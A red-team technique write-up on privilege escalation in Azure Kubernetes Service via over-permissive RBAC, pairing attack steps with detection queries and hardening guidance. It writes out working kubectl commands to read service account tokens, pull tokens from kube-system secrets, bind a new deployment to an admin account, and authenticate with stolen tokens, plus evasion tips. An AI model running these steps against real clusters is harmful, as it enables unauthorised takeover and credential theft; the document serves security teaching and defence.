| Attribute | Details |
|---|---|
| Technique ID | PE-ELEVATE-007 |
| MITRE ATT&CK v18.1 | T1548 - Abuse Elevation Control Mechanism |
| Tactic | Privilege Escalation |
| Platforms | Entra ID (Azure Kubernetes Service) |
| Severity | Critical |
| Technique Status | ACTIVE |
| Last Verified | 2026-01-09 |
| Affected Versions | AKS clusters (all versions), Kubernetes RBAC implementation |
| Patched In | N/A (Design-based vulnerability, not patchable) |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Azure Kubernetes Service (AKS) Role-Based Access Control (RBAC) misconfiguration allows attackers with limited Kubernetes cluster access to escalate privileges by exploiting overly permissive ClusterRole or Role bindings. This technique leverages the hierarchical nature of Kubernetes RBAC, where a compromised service account can inherit excessive permissions through role bindings that grant cluster-admin, edit, or view roles inappropriately across namespaces.
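The binding-inheritance mechanism described above can be sketched in a few lines of Python: given captured (Cluster)RoleBinding objects, list the roles a subject effectively holds through its bindings. The binding data below is illustrative sample data, not output from a real cluster.

```python
# Minimal sketch (not the Kubernetes implementation): resolve which roles
# a subject holds by walking RoleBinding/ClusterRoleBinding objects.
def roles_for_subject(bindings, kind, name, namespace=None):
    held = []
    for b in bindings:
        for s in b.get("subjects", []):
            if (s.get("kind") == kind and s.get("name") == name
                    and (namespace is None or s.get("namespace") == namespace)):
                held.append(b["roleRef"]["name"])
    return held

# Illustrative bindings: app-sa inherits "edit" in the default namespace
bindings = [
    {"roleRef": {"name": "edit"},
     "subjects": [{"kind": "ServiceAccount", "name": "app-sa", "namespace": "default"}]},
    {"roleRef": {"name": "view"},
     "subjects": [{"kind": "Group", "name": "auditors"}]},
]
print(roles_for_subject(bindings, "ServiceAccount", "app-sa", "default"))  # ['edit']
```

Any pod running as `app-sa` inherits everything `edit` grants, which is the escalation path this technique abuses.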
Attack Surface: Kubernetes API server, ClusterRole/Role definitions, RoleBinding/ClusterRoleBinding resources, service account token storage in pods, API audit logs.
Business Impact: Complete cluster compromise leading to workload exfiltration, lateral movement to backing infrastructure, and persistent backdoor installation. An attacker can move from a limited pod context to full cluster administration, enabling data theft, ransomware deployment across containerized applications, and supply chain attacks through container image manipulation.
Technical Context: This attack typically completes within seconds of obtaining initial pod access. Detection likelihood is low unless specific RBAC audit policies are enabled. The escalation is often irreversible without a comprehensive access review and credential re-provisioning.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | CIS v1.24 - 5.1.1 | RBAC and Service Accounts - Least privilege role assignment |
| DISA STIG | DISA-K8S-000001 | Kubernetes pods must run with restricted service accounts |
| CISA SCuBA | CISA-K8S-AC-01 | Access Control - Enforce least privilege for service accounts |
| NIST 800-53 | AC-3, AC-6 | Access Enforcement, Least Privilege |
| GDPR | Art. 32 | Security of Processing - Access control mechanisms |
| DORA | Art. 9 | Protection and Prevention - System access controls |
| NIS2 | Art. 21(1)(d) | Managing access to assets and services |
| ISO 27001 | A.9.2.3 | Management of Privileged Access Rights |
| ISO 27005 | Risk of unauthorized privilege escalation | Compromise of containerized workload isolation |
Supported Versions:
Tools:
Enumerate existing RBAC bindings to identify overly permissive roles:
# List all ClusterRoles with dangerous permissions
kubectl get clusterroles -o json | jq '.items[] | select(.rules[]? | select(.verbs[]? == "*" or .apiGroups[]? == "*")) | {name: .metadata.name, rules: .rules}'
# List all ClusterRoleBindings (who has what role)
kubectl get clusterrolebindings -o wide
# Check a specific service account's permissions
kubectl auth can-i --list --as=system:serviceaccount:default:default
What to Look For:
- Wildcard verbs (`*`) or overly broad apiGroups (`*`)
- Bindings that grant `cluster-admin`, `edit`, or `system:masters` to non-admin accounts

Version Note: Command syntax is consistent across Kubernetes 1.20+
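The jq filter above can also be reproduced offline; a minimal Python sketch run against a captured `kubectl get clusterroles -o json` dump (the sample roles below are illustrative):

```python
# Flag ClusterRoles whose rules contain wildcard verbs or apiGroups,
# mirroring the jq filter used for live enumeration.
def dangerous_roles(dump):
    flagged = []
    for item in dump.get("items", []):
        for rule in item.get("rules") or []:
            if "*" in (rule.get("verbs") or []) or "*" in (rule.get("apiGroups") or []):
                flagged.append(item["metadata"]["name"])
                break
    return flagged

# Illustrative dump: one wildcard role, one read-only role
dump = {"items": [
    {"metadata": {"name": "custom-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "pod-reader"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
]}
print(dangerous_roles(dump))  # ['custom-admin']
```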
# Check mounted service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Test current permissions
kubectl auth can-i get pods --namespace=default
kubectl auth can-i create pods --namespace=default
kubectl auth can-i get secrets
# Enumerate cluster roles available
kubectl get clusterroles | head -20
What to Look For:
Supported Versions: Kubernetes 1.20+, all AKS versions
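The mounted-credentials check can also be done programmatically; a small sketch that probes the standard projection path (outside a pod it simply returns False, and a different base directory can be passed for testing):

```python
import os

# Standard mount point for projected service account credentials in a pod
SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"

def in_cluster_credentials(base=SA_DIR):
    """Return True if the token, CA bundle, and namespace files are all present."""
    needed = ("token", "ca.crt", "namespace")
    return all(os.path.isfile(os.path.join(base, f)) for f in needed)

print(in_cluster_credentials())  # False outside a cluster
```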
Objective: Determine if the default service account has excessive cluster permissions
Command:
kubectl auth can-i --list
Expected Output (Vulnerable):
Resources     Non-Resource URLs   Resource Names   Verbs
*.*           []                  []               [*]
configmaps    []                  []               [get list watch]
pods          []                  []               [get list watch]
pods/log      []                  []               [get]
What This Means:
Objective: Identify dangerous pre-built roles available in the cluster
Command:
kubectl get clusterroles -o json | jq -r '.items[] | .metadata.name' | sort
Expected Output:
admin
cluster-admin
edit
system:aggregate-to-admin
system:masters
view
...
What This Means:
admin, edit, and cluster-admin are pre-built roles with escalated permissions.

Objective: Identify which service accounts are bound to dangerous roles
Command:
kubectl get rolebindings,clusterrolebindings --all-namespaces -o json | jq '.items[] | select(.roleRef.name == "cluster-admin" or .roleRef.name == "edit" or .roleRef.name == "admin") | {namespace: .metadata.namespace, subject: .subjects[], role: .roleRef.name}'
Expected Output (Vulnerable):
{
"namespace": "default",
"subject": {
"kind": "ServiceAccount",
"name": "app-sa",
"namespace": "default"
},
"role": "edit"
}
What This Means:
The app-sa service account has edit permissions in the default namespace.

OpSec & Evasion:
- Avoid explicit flags such as --user=attacker, which appear in audit logs

Objective: Deploy a new pod with escalated permissions
Command:
kubectl create deployment escalate-pod --image=alpine --namespace=default
kubectl set serviceaccount deployment escalate-pod admin-sa --namespace=default
# Alternatively, patch the pod template directly:
kubectl patch deployment escalate-pod --patch '{"spec":{"template":{"spec":{"serviceAccountName":"admin-sa"}}}}' --namespace=default
Expected Output:
deployment.apps/escalate-pod created
deployment.apps/escalate-pod patched
What This Means:
Troubleshooting:
- If the deployment fails, use kubectl run instead: kubectl run escalate-pod --image=alpine --overrides='{"spec":{"serviceAccountName":"admin-sa"}}'

Objective: Verify privilege escalation within the new pod container
Command (Execute inside the pod):
kubectl exec -it escalate-pod-<hash> -- /bin/sh
# Inside the pod:
kubectl auth can-i --list
kubectl get secrets -n kube-system
Expected Output:
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
NAME TYPE DATA
...
What This Means:
OpSec & Evasion:
- Use --as=system:serviceaccount:default:admin-sa to impersonate elevated accounts; note that impersonation is recorded in audit logs
- Consider an ephemeral debug container instead of a new pod: kubectl debug <pod> -it --image=alpine

Supported Versions: Kubernetes 1.20+
Objective: Find ClusterRoles that grant * (wildcard) permissions
Command:
kubectl get clusterroles -o json | jq '.items[] | select(.rules[]? | select(.verbs[]? == "*" or .apiGroups[]? == "*")) | {name: .metadata.name, rules: .rules}'
Expected Output (Vulnerable):
{
"name": "custom-admin",
"rules": [
{
"apiGroups": ["*"],
"resources": ["*"],
"verbs": ["*"]
}
]
}
What This Means:
The custom-admin role has completely unrestricted access.

Objective: Find which service accounts are bound to dangerous roles
Command:
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "custom-admin") | {name: .metadata.name, subjects: .subjects[]}'
Expected Output:
{
"name": "custom-admin-binding",
"subjects": {
"kind": "ServiceAccount",
"name": "app-service",
"namespace": "applications"
}
}
What This Means:
The app-service account in the applications namespace has wildcard permissions.

Objective: Transition from limited pod context to admin service account
Command:
# Use the admin service account's token (if accessible)
# Note: from Kubernetes 1.24 onward, token Secrets are no longer auto-created for
# service accounts; use `kubectl create token app-service -n applications` instead
export TOKEN=$(kubectl get secret -n applications $(kubectl get secret -n applications | grep app-service | awk '{print $1}') -o jsonpath='{.data.token}' | base64 -d)
# Configure kubectl to use the admin token
kubectl config set-credentials admin-creds --token=$TOKEN
kubectl config set-context admin-context --user=admin-creds --cluster=<cluster-name>
kubectl config use-context admin-context
# Verify escalation
kubectl auth can-i --list
Expected Output:
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
What This Means:
OpSec & Evasion:
Supported Versions: Kubernetes 1.20+
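Token-based authentication ultimately reduces to a Bearer header on every API call, which is all `kubectl config set-credentials --token=...` arranges. A sketch of the request that would be issued; the server URL and token are placeholders, and nothing is actually sent here:

```python
import urllib.request

# Placeholders: the in-cluster API endpoint and a stolen token
API_SERVER = "https://kubernetes.default.svc.cluster.local"
TOKEN = "<extracted-token>"

# Build (but do not send) an authenticated request to list ClusterRoleBindings
req = urllib.request.Request(
    f"{API_SERVER}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings",
    headers={"Authorization": f"Bearer {TOKEN}"},
)
print(req.get_header("Authorization"))  # Bearer <extracted-token>
```

Sending the request from inside a pod would additionally require the cluster CA bundle from the service account mount to validate TLS.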
Objective: Enumerate all service accounts and their RBAC bindings cluster-wide
Command:
# List all service accounts and their namespaces
kubectl get serviceaccounts --all-namespaces -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name}'
# For each service account, check its role bindings
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
echo "=== Namespace: $ns ==="
kubectl get rolebindings -n $ns -o json | jq '.items[] | {role: .roleRef.name, subjects: .subjects[]}'
done
Expected Output:
{
"namespace": "default",
"name": "default"
}
{
"namespace": "kube-system",
"name": "kubernetes-dashboard"
}
...
What This Means:
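The shell loop above can be replicated offline against a captured dump of RoleBindings, building a subject-to-roles map; the sample bindings below are illustrative:

```python
# Group captured RoleBinding items by subject: "namespace/name" -> [roles]
def bindings_by_subject(items):
    out = {}
    for b in items:
        for s in b.get("subjects") or []:
            key = f'{s.get("namespace", "-")}/{s["name"]}'
            out.setdefault(key, []).append(b["roleRef"]["name"])
    return out

# Illustrative dump: app-sa holds two roles in the default namespace
items = [
    {"roleRef": {"name": "edit"},
     "subjects": [{"kind": "ServiceAccount", "name": "app-sa", "namespace": "default"}]},
    {"roleRef": {"name": "view"},
     "subjects": [{"kind": "ServiceAccount", "name": "app-sa", "namespace": "default"}]},
]
print(bindings_by_subject(items))  # {'default/app-sa': ['edit', 'view']}
```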
Objective: Obtain the JWT token of a service account with higher privileges
Command:
# If you have RBAC access to list secrets in kube-system or other namespaces
kubectl get secret -n kube-system -o json | jq '.items[] | select(.type == "kubernetes.io/service-account-token") | {name: .metadata.name, namespace: .metadata.namespace}'
# Extract a specific token
SECRET_NAME=$(kubectl get secret -n kube-system | grep kubernetes-dashboard | awk '{print $1}')
kubectl get secret $SECRET_NAME -n kube-system -o jsonpath='{.data.token}' | base64 -d
Expected Output:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Ii...
What This Means:
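The token is a JWT, so its identity claims can be read without verification by base64url-decoding the middle segment. A self-contained sketch; the sample token is constructed in place rather than taken from a real cluster:

```python
import base64
import json

def jwt_payload(token):
    """Decode (without verifying) the claims segment of a JWT."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Build an illustrative service account token (header.payload.signature)
claims = {"iss": "kubernetes/serviceaccount",
          "sub": "system:serviceaccount:kube-system:kubernetes-dashboard"}
seg = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
sample = f"eyJhbGciOiJSUzI1NiJ9.{seg}.signature"

print(jwt_payload(sample)["sub"])  # system:serviceaccount:kube-system:kubernetes-dashboard
```

The `sub` claim reveals exactly which service account (and namespace) the stolen token authenticates as.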
Objective: Authenticate as the higher-privilege service account
Command:
# Use the extracted token to make API calls
curl -k -H "Authorization: Bearer $EXTRACTED_TOKEN" https://kubernetes.default.svc.cluster.local/api/v1/pods
# Or configure kubectl with the token
kubectl config set-credentials dashboard-sa --token=$EXTRACTED_TOKEN
kubectl config set-context dashboard-context --user=dashboard-sa --cluster=$(kubectl config view --minify -o jsonpath='{.clusters[0].name}')
kubectl config use-context dashboard-context
# Verify escalation
kubectl auth can-i delete clusterrolebindings
Expected Output:
yes
What This Means:
You now hold the permissions of the kubernetes-dashboard service account.

OpSec & Evasion:
Version: Latest stable (v1.28+) Minimum Version: 1.20 Supported Platforms: Linux, Windows, macOS
Installation:
# Download and install kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl
sudo mv kubectl /usr/local/bin/
Usage:
# Check permissions
kubectl auth can-i get pods
# List roles
kubectl get roles,clusterroles
# Create a pod
kubectl create deployment app --image=nginx
Version: Latest stable (2.55+) Minimum Version: 2.0 Supported Platforms: Linux, Windows, macOS
Installation:
# macOS
brew install azure-cli
# Linux
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
# Windows
choco install azure-cli
Usage:
# Connect to AKS
az aks get-credentials --resource-group myGroup --name myCluster
kubectl config current-context
# List AKS clusters
az aks list --output table
Version: 3.0+ Minimum Version: 1.0 Supported Platforms: Linux, Windows, macOS
Installation:
# From GitHub releases
wget https://github.com/aquasecurity/kubescan/releases/download/v2.0.0/kubescan-linux
chmod +x kubescan-linux
./kubescan-linux cluster
Usage:
# Scan for RBAC misconfigurations
./kubescan-linux audit --kubeconfig ~/.kube/config
# Simulate escalation discovery
kubectl auth can-i create clusterrolebindings
# If result is "yes", privilege escalation is possible
Reference: While Atomic Red Team does not have a Kubernetes-specific test for this technique, you can reference Atomic Red Team T1548
Rule Configuration:
- Table: AzureDiagnostics (AKS cluster audit logs)
- Key fields: operationName, properties.request.verb, properties.request.objectRef.resource

KQL Query:
AzureDiagnostics
| where ResourceProvider == "Microsoft.ContainerService"
| where operationName in ("create", "patch", "replace")
| where properties.request.objectRef.resource in ("clusterrolebindings", "rolebindings")
| where properties.request.objectRef.apiVersion contains "rbac"
| extend UserIdentity = properties.authentication.principalId
| extend RoleName = properties.request.objectRef.name
| summarize Count = count() by UserIdentity, RoleName, tostring(properties.request.verb)
| where Count > 0
What This Detects:
Manual Configuration Steps (Azure Portal):
- Alert name: AKS RBAC Binding Modification Detected
- Severity: High
- Query frequency: 5 minutes
- Lookback period: 1 hour

KQL Query:
AzureDiagnostics
| where ResourceProvider == "Microsoft.ContainerService"
| where properties.request.verb == "get"
| where properties.request.objectRef.resource == "secrets"
| where properties.request.objectRef.namespace in ("kube-system", "kube-public")
| where properties.authentication.principalId != "system:masters"
| extend ServiceAccount = properties.request.user.username
| extend TargetNamespace = properties.request.objectRef.namespace
| project TimeGenerated, ServiceAccount, TargetNamespace, tostring(properties.request.objectRef.name)
What This Detects:
Not applicable for AKS cluster-side detection. Monitoring should occur at the Azure platform level via Microsoft Sentinel/Defender for Cloud or on the container host via kubelet logs.
Alert Name: “Suspicious role assignment in Kubernetes cluster”
Manual Configuration Steps (Enable Defender for Cloud):
Reference: Microsoft Defender for Kubernetes Threat Detection
Implement Least Privilege RBAC: Restrict service account permissions to the minimum required for functionality.
Manual Steps (Azure Portal):
Manual Steps (kubectl/YAML):
# Create a restrictive role
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
namespace: default
name: app-role
rules:
- apiGroups: [""]
resources: ["pods", "configmaps"]
verbs: ["get", "list", "watch"]
---
# Bind the role to a service account
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
namespace: default
name: app-rolebinding
subjects:
- kind: ServiceAccount
name: app-sa
namespace: default
roleRef:
kind: Role
name: app-role
apiGroup: rbac.authorization.k8s.io
# Apply the YAML
kubectl apply -f restrictive-rbac.yaml
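Before applying, a manifest can be linted to confirm it grants only read verbs. A minimal sketch; the role dict mirrors the YAML above, and in practice you would load it from the file with a YAML parser:

```python
# Verbs considered read-only for least-privilege application roles
READ_ONLY = {"get", "list", "watch"}

def is_read_only(role):
    """True if every rule in the role grants only read-only verbs."""
    return all(set(rule.get("verbs", [])) <= READ_ONLY
               for rule in role.get("rules", []))

# Mirrors the app-role manifest above
role = {"kind": "Role",
        "metadata": {"name": "app-role", "namespace": "default"},
        "rules": [{"apiGroups": [""],
                   "resources": ["pods", "configmaps"],
                   "verbs": ["get", "list", "watch"]}]}
print(is_read_only(role))  # True
```

A wildcard verb (`*`) is not in the read-only set, so wildcard roles fail this check as well.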
Disable Dangerous Default Permissions: Remove cluster-admin bindings from unnecessary accounts.
Manual Steps:
# Identify dangerous bindings
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "cluster-admin") | .metadata.name'
# Remove the binding
kubectl delete clusterrolebinding <binding-name>
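The same identification step can be scripted against a captured dump of ClusterRoleBindings, ignoring built-in system subjects so only suspect bindings surface; the sample data is inlined for illustration:

```python
# List cluster-admin bindings whose subjects are not built-in system accounts
def nonsystem_admin_bindings(items):
    hits = []
    for b in items:
        if b["roleRef"]["name"] != "cluster-admin":
            continue
        for s in b.get("subjects") or []:
            if not s["name"].startswith("system:"):
                hits.append((b["metadata"]["name"], s["name"]))
    return hits

# Illustrative dump: one legitimate system binding, one backdoor
items = [
    {"metadata": {"name": "cluster-admin"},
     "roleRef": {"name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"metadata": {"name": "backdoor-admin"},
     "roleRef": {"name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "app-sa", "namespace": "default"}]},
]
print(nonsystem_admin_bindings(items))  # [('backdoor-admin', 'app-sa')]
```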
Enable Kubernetes RBAC Audit Logging: Ensure all RBAC changes are logged for detection and forensics.
Manual Steps (Azure Portal):
- Diagnostic setting name: AKS-RBAC-Audit
- Log categories: kube-audit, kube-audit-admin

Use Azure Managed Identities Instead of Service Accounts: Replace manual service account tokens with managed identities.
Manual Steps (Azure Portal):
Implement Pod Security Standards: Restrict the capabilities of pods to prevent lateral movement.
Manual Steps:
# Kubernetes 1.23+: enforce the "restricted" Pod Security Standard via namespace labels
# (PodSecurityPolicy was removed in Kubernetes 1.25)
apiVersion: v1
kind: Namespace
metadata:
  name: default
  labels:
    pod-security.kubernetes.io/enforce: restricted
---
# Pre-1.25 clusters: the equivalent PodSecurityPolicy
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restricted
spec:
  privileged: false
  runAsUser:
    rule: 'MustRunAsNonRoot'
  fsGroup:
    rule: 'RunAsAny'
Enable Azure Policy for Kubernetes: Enforce compliance policies cluster-wide.
Manual Steps (Azure Portal):
- Category: Kubernetes
- Example policy: "Kubernetes cluster containers should only use allowed images"

Conditional Access (Entra ID): Restrict access to the Kubernetes API based on device and location policies.
Manual Steps:
- Policy name: Restrict Kubernetes API Access

RBAC Group-Based Assignments: Use Entra ID groups for RBAC role assignments instead of individual accounts.
Manual Steps (kubectl):
# Create a rolebinding for an Entra ID group
kubectl create rolebinding app-readers \
--clusterrole=view \
--group="GROUP_OBJECT_ID_FROM_ENTRA_ID" \
--namespace=default
# Check if cluster-admin is only bound to trusted users
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name == "cluster-admin")'
# List all service accounts and their permissions
kubectl get serviceaccounts --all-namespaces -o json | jq -r '.items[] | "\(.metadata.namespace):\(.metadata.name)"' | while read SA; do
NS=$(echo $SA | cut -d: -f1)
NAME=$(echo $SA | cut -d: -f2)
echo "=== $SA ==="
kubectl auth can-i --list --as=system:serviceaccount:$NS:$NAME 2>/dev/null | grep -E "^\*|create|delete|patch"
done
Expected Output (If Secure):
No ClusterRoleBindings for cluster-admin (or only for system accounts)
=== default:app-sa ===
configmaps [] [] [get list watch]
pods [] [] [get list watch]
What to Look For:
- cluster-admin bindings limited to system:masters or built-in system accounts
- Application service accounts limited to get, list, watch verbs (read-only)
- No wildcard (*) verbs or apiGroups

Forensic Indicators:
- Service accounts with admin-, root-, escalate-, or time-based names
- Tokens under /var/run/secrets/kubernetes.io/serviceaccount/ that are accessed by non-kubelet processes
- create or patch operations on clusterrolebindings or roles from unexpected users
- Review /var/log/audit.log on the API server (if enabled) or AzureDiagnostics in Log Analytics
- Review pod logs (kubectl logs <pod>)
- Decode /var/run/secrets/kubernetes.io/serviceaccount/token to analyze the JWT (user, groups, capabilities)
- kubectl describe pod <pod> may show suspicious volume mounts or image changes

Isolate:
Command:
# Immediately delete the compromised pod
kubectl delete pod <compromised-pod> --namespace=<namespace>
# Or, revoke its service account token
kubectl delete secret -l serviceaccount=<sa-name> --namespace=<namespace>
Manual (Azure Portal):
Collect Evidence:
Command:
# Export audit logs from the API server (self-managed clusters only; in AKS the
# control plane is managed, so pull kube-audit logs from Log Analytics instead)
kubectl logs -n kube-system -l component=kube-apiserver | grep "rolebinding\|clusterrolebinding" > /evidence/audit-logs.txt
# Export pod logs
kubectl logs <compromised-pod> --namespace=<namespace> --all-containers > /evidence/pod-logs.txt
# Export service account secrets
kubectl get secret -n <namespace> -o yaml > /evidence/secrets.yaml
Remediate:
Command:
# Review and delete unauthorized role bindings
kubectl delete rolebinding <malicious-binding> --namespace=<namespace>
kubectl delete clusterrolebinding <malicious-cluster-binding>
# Restore default RBAC policies from backup or redeploy cluster
kubectl apply -f <backup-rbac-config>.yaml
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-005] AKS Control Plane Exploitation | Gain initial access to the cluster via exposed Kubelet API or container escape |
| 2 | Privilege Escalation | [PE-ELEVATE-007] AKS RBAC Excessive Permissions | Exploit misconfigured RBAC to escalate from pod to cluster-admin |
| 3 | Lateral Movement | [LM-AUTH-030] AKS Service Account Token Theft | Extract and abuse service account tokens for cross-namespace movement |
| 4 | Credential Access | [CA-TOKEN-013] AKS Service Account Token Theft | Harvest tokens from compromised service accounts |
| 5 | Persistence | [PERSIST-009] Kubernetes Secret Injection | Create backdoor service accounts and roles for persistent access |
| 6 | Impact | Container Image Tampering / Workload Exfiltration | Manipulate deployments or exfiltrate containerized data |
kubectl get secrets -n kube-system → Extracted cluster admin credentials